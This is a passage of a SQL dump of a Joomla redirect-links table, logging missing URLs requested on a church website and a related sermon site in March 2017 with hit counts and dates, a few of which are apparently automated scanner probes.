(4104, 'http://www.lifeoasisinternationalchurch.org/index.php/11-demo-articles/7-tutorials-and-guides', NULL, '', '', 2, 0, '2017-03-10 15:44:25', '0000-00-00 00:00:00', 301),
(4105, 'http://www.lifeoasisinternationalchurch.org/faith.php', NULL, '', '', 2, 0, '2017-03-10 17:50:57', '0000-00-00 00:00:00', 301),
(4106, 'http://lifeoasisinternationalchurch.org/proxy.php', NULL, 'lifeoasisinternationalchurch.org', '', 1, 0, '2017-03-10 19:36:54', '0000-00-00 00:00:00', 301),
(4107, 'http://www.lifeoasisinternationalchurch.org/loic/ourbelieve.php', NULL, '', '', 9, 0, '2017-03-11 01:18:08', '0000-00-00 00:00:00', 301),
(4108, 'http://www.lifeoasisinternationalchurch.org/loic/prayerrequest.php', NULL, '', '', 7, 0, '2017-03-11 01:48:25', '0000-00-00 00:00:00', 301),
(4109, 'http://lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/28', NULL, '', '', 1, 0, '2017-03-11 06:05:44', '0000-00-00 00:00:00', 301),
(4110, 'http://lifeoasisinternationalchurch.org/update.php', NULL, '', '', 4, 0, '2017-03-11 06:43:22', '0000-00-00 00:00:00', 301),
(4111, 'http://lifeoasisinternationalchurch.org/streaming/18-loic/50-young-achievers', NULL, '', '', 7, 0, '2017-03-11 10:19:06', '0000-00-00 00:00:00', 301),
(4112, 'http://www.lifeoasisinternationalchurch.org/index.php/12-sample-content/', NULL, '', '', 2, 0, '2017-03-11 14:52:17', '0000-00-00 00:00:00', 301),
(4113, 'http://lifeoasisinternationalchurch.org/index.php/template-info/music/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-03-11 15:50:22', '0000-00-00 00:00:00', 301),
(4114, 'http://lifeoasisinternationalchurch.org/index.php/template-info/wimmp/18-loic/50-young-achievers', NULL, '', '', 9, 0, '2017-03-11 16:40:04', '0000-00-00 00:00:00', 301),
(4115, 'http://www.lifeoasisinternationalchurch.org/151-prayerfocus30', NULL, '', '', 1, 0, '2017-03-11 19:38:18', '0000-00-00 00:00:00', 301),
(4116, 'https://lifeoasisinternationalchurch.org/resources/streaming', NULL, '', '', 58, 0, '2017-03-12 02:11:00', '0000-00-00 00:00:00', 301),
(4117, 'https://www.lifeoasisinternationalchurch.org/resources/streaming', NULL, '', '', 169, 0, '2017-03-12 04:16:00', '0000-00-00 00:00:00', 301),
(4118, 'http://lifeoasisinternationalchurch.org/templ<div class=', NULL, 'http://lifeoasisinternationalchurch.org/streaming', '', 1, 0, '2017-03-12 07:19:14', '0000-00-00 00:00:00', 301),
(4119, 'http://lifeoasisinternationalchurch.org/testimonies/week.listevents/2012/08/05/15', NULL, '', '', 2, 0, '2017-03-12 09:15:20', '0000-00-00 00:00:00', 301),
(4120, 'https://lifeoasisinternationalchurch.org/loic/ljmt.php', NULL, '', '', 6, 0, '2017-03-12 09:15:42', '0000-00-00 00:00:00', 301),
(4121, 'http://www.lifeoasisinternationalchurch.org/index.php/176-2015-day-1', NULL, '', '', 5, 0, '2017-03-12 13:32:54', '0000-00-00 00:00:00', 301),
(4122, 'http://www.lifeoasisinternationalchurch.org/component/users/?view=remind/RK=0/RS=59y834Tgsoi1RqsIO1Ojyvl4vV8-', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 1, 0, '2017-03-12 13:40:20', '0000-00-00 00:00:00', 301),
(4123, 'http://www.lifeoasisinternationalchurch.org/loic/partnership.php', NULL, '', '', 21, 0, '2017-03-12 19:05:19', '0000-00-00 00:00:00', 301),
(4124, 'https://www.lifeoasisinternationalchurch.org/.well-known/apple-app-site-association', NULL, '', '', 85, 0, '2017-03-12 19:24:23', '0000-00-00 00:00:00', 301),
(4125, 'https://www.lifeoasisinternationalchurch.org/apple-app-site-association', NULL, '', '', 85, 0, '2017-03-12 19:24:23', '0000-00-00 00:00:00', 301),
(4126, 'https://lifeoasisinternationalchurch.org/apple-app-site-association', NULL, '', '', 92, 0, '2017-03-12 19:24:24', '0000-00-00 00:00:00', 301),
(4127, 'https://lifeoasisinternationalchurch.org/.well-known/apple-app-site-association', NULL, '', '', 90, 0, '2017-03-12 19:24:25', '0000-00-00 00:00:00', 301),
(4128, 'https://lifeoasisinternationalchurch.org/main-streaming', NULL, '', '', 402, 0, '2017-03-13 03:24:53', '0000-00-00 00:00:00', 301),
(4129, 'https://www.spiritmeat.net/mp3-messages', NULL, '', '', 1, 0, '2017-03-13 05:51:17', '0000-00-00 00:00:00', 301),
(4130, 'https://www.spiritmeat.net/mp3-messages/sermons', NULL, '', '', 2, 0, '2017-03-13 05:51:36', '0000-00-00 00:00:00', 301),
(4131, 'https://www.spiritmeat.net/mp3-messages/sermons/0/0', NULL, '', '', 5, 0, '2017-03-13 05:51:38', '0000-00-00 00:00:00', 301),
(4132, 'https://www.spiritmeat.net/mp3-messages/speaker/2', NULL, '', '', 3, 0, '2017-03-13 05:51:54', '0000-00-00 00:00:00', 301),
(4133, 'https://www.spiritmeat.net/mp3-messages/speaker/2-rev-olusola-ayodele-areogun', NULL, '', '', 1, 0, '2017-03-13 05:51:56', '0000-00-00 00:00:00', 301),
(4134, 'https://www.spiritmeat.net/mp3-messages/speaker/2-rev-olusola-ayodele-areogun/series', NULL, '', '', 1, 0, '2017-03-13 05:51:59', '0000-00-00 00:00:00', 301),
(4135, 'https://www.spiritmeat.net/mp3-messages/speaker/2/sermons?start=20', NULL, '', '', 1, 0, '2017-03-13 05:52:02', '0000-00-00 00:00:00', 301),
(4136, 'https://www.spiritmeat.net/mp3-messages/speaker/3-rev-mrs-oyenike-areogun', NULL, '', '', 1, 0, '2017-03-13 05:52:06', '0000-00-00 00:00:00', 301),
(4137, 'https://www.spiritmeat.net/mp3-messages/speaker/3-rev-mrs-oyenike-areogun/series', NULL, '', '', 1, 0, '2017-03-13 05:52:09', '0000-00-00 00:00:00', 301),
(4138, 'https://www.spiritmeat.net/mp3-messages/speaker/3-rev-mrs-oyenike-areogun/sermons', NULL, '', '', 1, 0, '2017-03-13 05:52:11', '0000-00-00 00:00:00', 301),
(4139, 'https://www.spiritmeat.net/partnership/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-03-13 05:52:15', '0000-00-00 00:00:00', 301),
(4140, 'https://www.spiritmeat.net/resources/baptism/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-03-13 05:52:17', '0000-00-00 00:00:00', 301),
(4141, 'https://www.spiritmeat.net/resources/salvation/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-03-13 05:52:25', '0000-00-00 00:00:00', 301),
(4142, 'https://www.spiritmeat.net/resources/youtube-live?tmpl=component&print=1&page=', NULL, '', '', 1, 0, '2017-03-13 05:52:32', '0000-00-00 00:00:00', 301),
(4143, 'https://www.spiritmeat.net/streaming3/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-03-13 05:52:35', '0000-00-00 00:00:00', 301),
(4144, 'https://www.spiritmeat.net/template-info-2/dream-centre-ordained-pastors/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-03-13 05:52:41', '0000-00-00 00:00:00', 301),
(4145, 'https://www.spiritmeat.net/template-info-2/our-belief/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-03-13 05:52:43', '0000-00-00 00:00:00', 301),
(4146, 'https://www.spiritmeat.net/template-info-2/our-service-schedule/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-03-13 05:52:46', '0000-00-00 00:00:00', 301),
(4147, 'https://www.spiritmeat.net/template-info-2/rev-oyenike-areogun/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-03-13 05:52:49', '0000-00-00 00:00:00', 301),
(4148, 'https://www.spiritmeat.net/template-info-2/the-church-2/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-13 05:52:52', '0000-00-00 00:00:00', 301),
(4149, 'https://www.spiritmeat.net/template-info-2/the-church/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-13 05:52:54', '0000-00-00 00:00:00', 301),
(4150, 'https://www.spiritmeat.net/template-info/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-13 05:52:57', '0000-00-00 00:00:00', 301),
(4151, 'https://www.spiritmeat.net/template-info/books/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-13 05:52:59', '0000-00-00 00:00:00', 301),
(4152, 'https://www.spiritmeat.net/template-info/gin/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-13 05:53:01', '0000-00-00 00:00:00', 301),
(4153, 'https://www.spiritmeat.net/template-info/ljmti/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-13 05:53:03', '0000-00-00 00:00:00', 301),
(4154, 'https://www.spiritmeat.net/template-info/media-outreach/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-13 05:53:06', '0000-00-00 00:00:00', 301),
(4155, 'https://www.spiritmeat.net/template-info/mimmp/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-13 05:53:08', '0000-00-00 00:00:00', 301),
(4156, 'https://www.spiritmeat.net/template-info/music/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-03-13 05:53:10', '0000-00-00 00:00:00', 301),
(4157, 'https://www.spiritmeat.net/template-info/outreach/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-13 05:53:15', '0000-00-00 00:00:00', 301),
(4158, 'https://www.spiritmeat.net/template-info/wimmp/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-13 05:53:17', '0000-00-00 00:00:00', 301),
(4159, 'https://www.spiritmeat.net/component/content/article/11-demo-articles/10-preset-styles', NULL, '', '', 1, 0, '2017-03-13 08:21:09', '0000-00-00 00:00:00', 301),
(4160, 'https://www.spiritmeat.net/component/content/article/11-demo-articles/20-welcome?tmpl=component&print=1&page=', NULL, '', '', 1, 0, '2017-03-13 08:21:36', '0000-00-00 00:00:00', 301),
(4161, 'https://www.spiritmeat.net/component/content/article/11-demo-articles/53-testing', NULL, '', '', 2, 0, '2017-03-13 08:22:05', '0000-00-00 00:00:00', 301),
(4162, 'https://www.spiritmeat.net/component/content/article/11-demo-articles/54-slide-04?tmpl=component&print=1&page=', NULL, '', '', 1, 0, '2017-03-13 08:22:17', '0000-00-00 00:00:00', 301),
(4163, 'https://www.spiritmeat.net/component/content/article/11-demo-articles/6-integrated-extensions', NULL, '', '', 1, 0, '2017-03-13 08:22:21', '0000-00-00 00:00:00', 301),
(4164, 'https://www.spiritmeat.net/component/content/article/11-demo-articles/63-disclaimer', NULL, '', '', 2, 0, '2017-03-13 08:22:31', '0000-00-00 00:00:00', 301),
(4165, 'https://www.spiritmeat.net/component/content/article/12-sample-content/12-sample-content-1?tmpl=component&print=1&page=', NULL, '', '', 1, 0, '2017-03-13 08:22:41', '0000-00-00 00:00:00', 301),
(4166, 'https://www.spiritmeat.net/component/content/article/12-sample-content/15-sample-content-4?tmpl=component&print=1&page=', NULL, '', '', 1, 0, '2017-03-13 08:23:05', '0000-00-00 00:00:00', 301),
(4167, 'https://www.spiritmeat.net/component/content/article/12-sample-content/16-sample-content-5', NULL, '', '', 2, 0, '2017-03-13 08:23:09', '0000-00-00 00:00:00', 301),
(4168, 'https://www.spiritmeat.net/component/content/article/12-sample-content/17-sample-content-6?tmpl=component&print=1&page=', NULL, '', '', 1, 0, '2017-03-13 08:23:16', '0000-00-00 00:00:00', 301),
(4169, 'https://www.spiritmeat.net/component/content/article/17-fp-headlines-lists/55-kb-zp', NULL, '', '', 2, 0, '2017-03-13 08:23:32', '0000-00-00 00:00:00', 301),
(4170, 'https://www.spiritmeat.net/component/content/article/18-loic/34-music', NULL, '', '', 1, 0, '2017-03-13 08:23:41', '0000-00-00 00:00:00', 301),
(4171, 'https://www.spiritmeat.net/component/content/article/2-uncategorised/60-destinytv', NULL, '', '', 2, 0, '2017-03-13 08:23:55', '0000-00-00 00:00:00', 301),
(4172, 'https://www.spiritmeat.net/component/content/category/11-demo-articles', NULL, '', '', 3, 0, '2017-03-13 08:24:32', '0000-00-00 00:00:00', 301),
(4173, 'https://www.spiritmeat.net/component/content/index.php?option=com_content&view=article&id=47:videos&catid=2:uncategorised&Itemid=189', NULL, '', '', 1, 0, '2017-03-13 08:32:53', '0000-00-00 00:00:00', 301),
(4174, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/12', NULL, '', '', 1, 0, '2017-03-13 08:32:55', '0000-00-00 00:00:00', 301),
(4175, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/13', NULL, '', '', 1, 0, '2017-03-13 08:32:58', '0000-00-00 00:00:00', 301),
(4176, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/14', NULL, '', '', 1, 0, '2017-03-13 08:33:00', '0000-00-00 00:00:00', 301),
(4177, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/15', NULL, '', '', 1, 0, '2017-03-13 08:33:02', '0000-00-00 00:00:00', 301),
(4178, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/19', NULL, '', '', 1, 0, '2017-03-13 08:33:05', '0000-00-00 00:00:00', 301),
(4179, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/2', NULL, '', '', 1, 0, '2017-03-13 08:33:07', '0000-00-00 00:00:00', 301),
(4180, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/20', NULL, '', '', 1, 0, '2017-03-13 08:33:09', '0000-00-00 00:00:00', 301),
(4181, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/22', NULL, '', '', 1, 0, '2017-03-13 08:33:11', '0000-00-00 00:00:00', 301),
(4182, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/23', NULL, '', '', 1, 0, '2017-03-13 08:33:13', '0000-00-00 00:00:00', 301),
(4183, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/24', NULL, '', '', 1, 0, '2017-03-13 08:33:15', '0000-00-00 00:00:00', 301),
(4184, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/25', NULL, '', '', 1, 0, '2017-03-13 08:33:17', '0000-00-00 00:00:00', 301),
(4185, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/26', NULL, '', '', 1, 0, '2017-03-13 08:33:20', '0000-00-00 00:00:00', 301),
(4186, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/27', NULL, '', '', 1, 0, '2017-03-13 08:33:22', '0000-00-00 00:00:00', 301),
(4187, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/28', NULL, '', '', 1, 0, '2017-03-13 08:33:24', '0000-00-00 00:00:00', 301),
(4188, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/3', NULL, '', '', 1, 0, '2017-03-13 08:33:26', '0000-00-00 00:00:00', 301),
(4189, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/4', NULL, '', '', 1, 0, '2017-03-13 08:33:28', '0000-00-00 00:00:00', 301),
(4190, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/5', NULL, '', '', 1, 0, '2017-03-13 08:33:30', '0000-00-00 00:00:00', 301),
(4191, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/6', NULL, '', '', 1, 0, '2017-03-13 08:33:32', '0000-00-00 00:00:00', 301),
(4192, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/7', NULL, '', '', 1, 0, '2017-03-13 08:33:34', '0000-00-00 00:00:00', 301),
(4193, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/8', NULL, '', '', 1, 0, '2017-03-13 08:33:36', '0000-00-00 00:00:00', 301),
(4194, 'https://www.spiritmeat.net/featured-messages/2-uncategorised/47-videos', NULL, '', '', 1, 0, '2017-03-13 08:36:13', '0000-00-00 00:00:00', 301),
(4195, 'https://www.spiritmeat.net/gobc2015/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-13 08:36:15', '0000-00-00 00:00:00', 301),
(4196, 'https://www.spiritmeat.net/hidden-stream/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-03-13 08:36:18', '0000-00-00 00:00:00', 301),
(4197, 'http://www.lifeoasisinternationalchurch.org/resources/YouTube-live', NULL, '', '', 5, 0, '2017-03-13 14:04:36', '0000-00-00 00:00:00', 301),
(4198, 'http://www.lifeoasisinternationalchurch.org/resources/YouTube-live', NULL, '', '', 1, 0, '2017-03-13 14:04:36', '0000-00-00 00:00:00', 301),
(4199, 'http://lifeoasisinternationalchurch.org/bloggi.no/edwardoles', NULL, '', '', 8, 0, '2017-03-13 21:02:24', '0000-00-00 00:00:00', 301),
(4200, 'http://lifeoasisinternationalchurch.org/140-2014-11', NULL, '', '', 2, 0, '2017-03-13 21:02:35', '0000-00-00 00:00:00', 301),
(4201, 'http://lifeoasisinternationalchurch.org/158-focus32-5', NULL, '', '', 2, 0, '2017-03-13 21:02:35', '0000-00-00 00:00:00', 301),
(4202, 'http://lifeoasisinternationalchurch.org/161-day222014-5', NULL, '', '', 2, 0, '2017-03-13 21:02:36', '0000-00-00 00:00:00', 301),
(4203, 'http://www.lifeoasisinternationalchurch.org/index.php/programme/18-loic/35-trm', NULL, '', '', 3, 0, '2017-03-14 04:18:06', '0000-00-00 00:00:00', 301),
(4204, 'http://lifeoasisinternationalchurch.org//sites/default/files/up.php', NULL, '', '', 2, 0, '2017-03-14 05:43:46', '0000-00-00 00:00:00', 301),
(4205, 'http://www.lifeoasisinternationalchurch.org/prayer/7-kindom-builder/18-prayer-a-fasting-day', NULL, '', '', 2, 0, '2017-03-14 06:50:05', '0000-00-00 00:00:00', 301),
(4206, 'https://www.spiritmeat.net/about-us/dream-centre-ordained-pastors/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-14 09:54:17', '0000-00-00 00:00:00', 301),
(4207, 'https://www.spiritmeat.net/about-us/our-belief/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-14 09:54:19', '0000-00-00 00:00:00', 301),
(4208, 'https://www.spiritmeat.net/about-us/our-service-schedule/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-14 09:54:21', '0000-00-00 00:00:00', 301),
(4209, 'https://www.spiritmeat.net/about-us/rev-oyenike-areogun/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-14 09:54:24', '0000-00-00 00:00:00', 301),
(4210, 'https://www.spiritmeat.net/about-us/the-church-2/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-14 09:54:26', '0000-00-00 00:00:00', 301),
(4211, 'https://www.spiritmeat.net/about-us/the-church/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-14 09:54:28', '0000-00-00 00:00:00', 301),
(4212, 'https://www.spiritmeat.net/component/content/article/12-sample-content/18-sample-content-7', NULL, '', '', 1, 0, '2017-03-14 09:54:30', '0000-00-00 00:00:00', 301),
(4213, 'https://www.spiritmeat.net/component/content/article/12-sample-content/19-sample-content-8', NULL, '', '', 1, 0, '2017-03-14 09:54:32', '0000-00-00 00:00:00', 301),
(4214, 'https://www.spiritmeat.net/component/content/category/18-loic', NULL, '', '', 1, 0, '2017-03-14 09:54:43', '0000-00-00 00:00:00', 301),
(4215, 'https://www.spiritmeat.net/component/content/category/index.php?option=com_content&view=article&id=47:videos&catid=2:uncategorised&Itemid=189', NULL, '', '', 1, 0, '2017-03-14 09:55:27', '0000-00-00 00:00:00', 301),
(4216, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/1', NULL, '', '', 1, 0, '2017-03-14 09:55:33', '0000-00-00 00:00:00', 301),
(4217, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/10', NULL, '', '', 1, 0, '2017-03-14 09:55:35', '0000-00-00 00:00:00', 301),
(4218, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/11', NULL, '', '', 1, 0, '2017-03-14 09:55:37', '0000-00-00 00:00:00', 301),
(4219, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/16', NULL, '', '', 1, 0, '2017-03-14 09:55:41', '0000-00-00 00:00:00', 301),
(4220, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/17', NULL, '', '', 1, 0, '2017-03-14 09:55:43', '0000-00-00 00:00:00', 301),
(4221, 'https://www.spiritmeat.net/component/jcomments/feed/com_sermonspeaker/18', NULL, '', '', 1, 0, '2017-03-14 09:55:47', '0000-00-00 00:00:00', 301),
(4222, 'https://lifeoasisinternationalchurch.org/ministries/media-outreach/18-loic/50-young-achievers', NULL, '', '', 15, 0, '2017-03-14 11:47:56', '0000-00-00 00:00:00', 301),
(4223, 'https://www.spiritmeat.net/ministries/books/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-14 12:55:22', '0000-00-00 00:00:00', 301),
(4224, 'https://www.spiritmeat.net/ministries/gin/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-14 12:55:25', '0000-00-00 00:00:00', 301),
(4225, 'https://www.spiritmeat.net/ministries/ljmti/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-14 12:55:29', '0000-00-00 00:00:00', 301),
(4226, 'https://www.spiritmeat.net/ministries/mimmp/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-14 12:55:37', '0000-00-00 00:00:00', 301),
(4227, 'https://www.spiritmeat.net/ministries/outreach/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-14 12:55:41', '0000-00-00 00:00:00', 301),
(4228, 'https://www.spiritmeat.net/ministries/wimmp/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-14 12:55:44', '0000-00-00 00:00:00', 301),
(4229, 'https://www.spiritmeat.net/resources/father-s-heart/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-03-14 12:55:56', '0000-00-00 00:00:00', 301),
(4230, 'https://www.spiritmeat.net/resources/stream/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-03-14 12:56:25', '0000-00-00 00:00:00', 301),
(4231, 'https://www.spiritmeat.net/resources/youtube-live/18-loic/50-young-achievers', NULL, '', '', 2, 0, '2017-03-14 12:56:34', '0000-00-00 00:00:00', 301),
(4232, 'https://www.spiritmeat.net/streaming/18-loic/50-young-achievers', NULL, '', '', 1, 0, '2017-03-14 12:56:46', '0000-00-00 00:00:00', 301),
(4233, 'http://www.lifeoasisinternationalchurch.org/index.php/programme/12-sample-content/15-sample-content-4', NULL, '', '', 2, 0, '2017-03-14 14:24:01', '0000-00-00 00:00:00', 301),
(4234, 'http://www.lifeoasisinternationalchurch.org/live-streaming', NULL, '', '', 5, 0, '2017-03-14 15:16:01', '0000-00-00 00:00:00', 301),
(4235, 'http://lifeoasisinternationalchurch.org/pivate', NULL, '', '', 1, 0, '2017-03-14 15:44:27', '0000-00-00 00:00:00', 301),
(4236, 'http://www.lifeoasisinternationalchurch.org/YOU TUBE', NULL, '', '', 3, 0, '2017-03-14 16:46:55', '0000-00-00 00:00:00', 301),
(4237, 'http://www.lifeoasisinternationalchurch.org/youtubeprivate', NULL, '', '', 2, 0, '2017-03-14 16:47:17', '0000-00-00 00:00:00', 301),
(4238, 'http://lifeoasisinternationalchurch.org/loic/revoyenike.php', NULL, '', '', 17, 0, '2017-03-14 17:05:41', '0000-00-00 00:00:00', 301),
(4239, 'http://lifeoasisinternationalchurch.org/resources/private', NULL, '', '', 23, 0, '2017-03-14 17:13:56', '0000-00-00 00:00:00', 301),
(4240, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/34-prayer-a-fasting-day-25', NULL, '', '', 15, 0, '2017-03-14 17:20:35', '0000-00-00 00:00:00', 301),
(4241, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/18-prayer-a-fasting-day-10', NULL, '', '', 20, 0, '2017-03-14 17:21:36', '0000-00-00 00:00:00', 301),
(4242, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/48-prayer-a-fasting-day-37', NULL, '', '', 14, 0, '2017-03-14 17:22:21', '0000-00-00 00:00:00', 301),
(4243, 'http://www.lifeoasisinternationalchurch.org/p', NULL, '', '', 8, 0, '2017-03-14 18:12:07', '0000-00-00 00:00:00', 301),
(4244, 'http://www.lifeoasisinternationalchurch.org/pt', NULL, '', '', 1, 0, '2017-03-14 18:12:08', '0000-00-00 00:00:00', 301),
(4245, 'http://www.lifeoasisinternationalchurch.org/pr', NULL, '', '', 8, 0, '2017-03-14 18:12:11', '0000-00-00 00:00:00', 301),
(4246, 'http://www.lifeoasisinternationalchurch.org/pri', NULL, '', '', 9, 0, '2017-03-14 18:12:12', '0000-00-00 00:00:00', 301),
(4247, 'http://www.lifeoasisinternationalchurch.org/priv', NULL, '', '', 7, 0, '2017-03-14 18:12:14', '0000-00-00 00:00:00', 301),
(4248, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/52-prayer-a-fasting-day-4', NULL, '', '', 19, 0, '2017-03-14 19:25:56', '0000-00-00 00:00:00', 301),
(4249, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/54-prayer-a-fasting-day-5', NULL, '', '', 23, 0, '2017-03-14 19:25:57', '0000-00-00 00:00:00', 301),
(4250, 'https://lifeoasisinternationalchurch.org/index.php/11-kindom-builder/51-prophetic-words-for-day-39', NULL, '', '', 22, 0, '2017-03-14 19:26:59', '0000-00-00 00:00:00', 301),
(4251, 'https://lifeoasisinternationalchurch.org/component/jcomments/feed/com_sermonspeaker/14', NULL, '', '', 12, 0, '2017-03-15 00:30:24', '0000-00-00 00:00:00', 301),
(4252, 'http://www.lifeoasisinternationalchurch.org/index.php/component/jcomments/feed/com_sermonspeaker/24', NULL, '', '', 4, 0, '2017-03-15 01:34:46', '0000-00-00 00:00:00', 301),
(4253, 'http://lifeoasisinternationalchurch.org/testimonies/week.listevents/2012/07/09/15', NULL, '', '', 5, 0, '2017-03-15 10:44:14', '0000-00-00 00:00:00', 301),
(4254, 'http://lifeoasisinternationalchurch.org/testimonies/day.listevents/2012/08/11/15', NULL, '', '', 3, 0, '2017-03-15 10:52:19', '0000-00-00 00:00:00', 301),
(4255, 'http://lifeoasisinternationalchurch.org/mysqldumper/sql.php', NULL, '', '', 1, 0, '2017-03-15 11:54:35', '0000-00-00 00:00:00', 301),
(4256, 'http://lifeoasisinternationalchurch.org/backup/sql.php', NULL, '', '', 1, 0, '2017-03-15 11:54:36', '0000-00-00 00:00:00', 301),
(4257, 'http://lifeoasisinternationalchurch.org/sql/sql.php', NULL, '', '', 1, 0, '2017-03-15 11:54:37', '0000-00-00 00:00:00', 301),
(4258, 'http://lifeoasisinternationalchurch.org/admin/sql.php', NULL, '', '', 1, 0, '2017-03-15 11:54:38', '0000-00-00 00:00:00', 301),
(4259, 'http://lifeoasisinternationalchurch.org/msd1.24.2/sql.php', NULL, '', '', 1, 0, '2017-03-15 11:54:38', '0000-00-00 00:00:00', 301),
(4260, 'http://lifeoasisinternationalchurch.org/msd1.24.3/sql.php', NULL, '', '', 1, 0, '2017-03-15 11:54:39', '0000-00-00 00:00:00', 301),
(4261, 'http://lifeoasisinternationalchurch.org/msd1.24.4/sql.php', NULL, '', '', 1, 0, '2017-03-15 11:54:40', '0000-00-00 00:00:00', 301),
(4262, 'http://lifeoasisinternationalchurch.org/msd1.24stable/sql.php', NULL, '', '', 1, 0, '2017-03-15 11:54:41', '0000-00-00 00:00:00', 301),
(4263, 'https://lifeoasisinternationalchurch.org/loic/gallery.php', NULL, '', '', 2, 0, '2017-03-15 15:02:44', '0000-00-00 00:00:00', 301);
INSERT INTO `y57u5_redirect_links` (`id`, `old_url`, `new_url`, `referer`, `comment`, `hits`, `published`, `created_date`, `modified_date`, `header`) VALUES
(4264, 'http://www.lifeoasisinternationalchurch.org/template-info/index.php?option=com_content&view=article&id=48:wimmp&catid=18:loic&Itemid=239', NULL, 'http://www.google.com.ng/search?q=rev+mrs+oyenike+areogun+messages+on+motherhood&btnG=&client=ms-opera-mini-android&channel=new', '', 1, 0, '2017-03-15 15:23:15', '0000-00-00 00:00:00', 301),
(4265, 'https://lifeoasisinternationalchurch.org/mp3-messages', NULL, '', '', 553, 0, '2017-03-15 16:10:59', '0000-00-00 00:00:00', 301),
(4266, 'http://lifeoasisinternationalchurch.org/streamineg', NULL, '', '', 1, 0, '2017-03-15 17:28:38', '0000-00-00 00:00:00', 301),
(4267, 'http://www.lifeoasisinternationalchurch.org/si', NULL, '', '', 1, 0, '2017-03-15 17:40:51', '0000-00-00 00:00:00', 301),
(4268, 'http://www.lifeoasisinternationalchurch.org/sir', NULL, '', '', 1, 0, '2017-03-15 17:40:51', '0000-00-00 00:00:00', 301),
(4269, 'http://lifeoasisinternationalchurch.org/testimonies/day.listevents/2012/08/03/15', NULL, '', '', 3, 0, '2017-03-15 17:46:46', '0000-00-00 00:00:00', 301),
(4270, 'http://lifeoasisinternationalchurch.org/testimonies/month.calendar/2011/11/29/-', NULL, '', '', 1, 0, '2017-03-15 17:51:42', '0000-00-00 00:00:00', 301),
(4271, 'http://www.lifeoasisinternationalchurch.org/undefined', NULL, 'http://www.lifeoasisinternationalchurch.org/', '', 1, 0, '2017-03-15 18:07:27', '0000-00-00 00:00:00', 301),
(4272, 'http://www.lifeoasisinternationalchurch.org/resources/undefined', NULL, 'http://www.lifeoasisinternationalchurch.org/resources/live-streaming', '', 3, 0, '2017-03-15 18:09:53', '0000-00-00 00:00:00', 301),
(4273, 'http://lifeoasisinternationalchurch.org/8080', NULL, '', '', 1, 0, '2017-03-15 18:22:45', '0000-00-00 00:00:00', 301),
